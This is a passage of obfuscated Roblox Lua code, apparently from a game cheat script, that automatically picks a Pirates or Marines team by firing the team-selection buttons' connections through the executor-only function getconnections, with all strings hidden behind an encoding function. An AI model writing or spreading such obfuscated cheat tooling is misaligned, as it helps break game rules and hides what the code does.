pairs(getconnections(game:GetService(v7("\234\231\118\241\142\213\201","\167\186\139\23\136\235")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Pirates.Frame.ViewportFrame.TextButton[v260])) do v262.Function();end end elseif (_G.Team==v7("\70\152\137\31\19\187\141\30\68","\109\122\213\232")) then for v263,v264 in pairs({v7("\195\248\183\35\235\213\183\36\250\248\172\97\205\251\171\51\229","\80\142\151\194"),v7("\46\201\98\95\6\228\98\88\23\201\121\29\39\201\96\66","\44\99\166\23"),v7("\93\244\61\63\37\165\104\242\45","\196\28\151\73\86\83")}) do for v269,v270 in pairs(getconnections(game:GetService(v7("\195\15\40\9\135\74\11","\22\147\99\73\112\226\56\120")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v264])) do v270.Function();end end else for v265,v266 in pairs({v7("\149\122\247\230\136\154\96\246\225\130\182\36\193\249\132\187\126","\237\216\21\130\149"),v7("\175\65\74\76\181\235\75\150\90\80\81\225\237\81\149\64","\62\226\46\63\63\208\169"),v7("\196\26\65\138\9\12\59\91\225","\62\133\121\53\227\127\109\79")}) do for v271,v272 in pairs(getconnections(game:GetService(v7("\32\24\51\236\211\188\177","\194\112\116\82\149\182\206")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v266])) do v272.Function();end end end break;end end end);break;end end until join==true  game:GetService(v7("\9\164\77\1\197\240\29","\110\89\200\44\120\160\130")).LocalPlayer.PlayerGui.Main.ChooseTeam.Visible=false;break;end end break;end end end
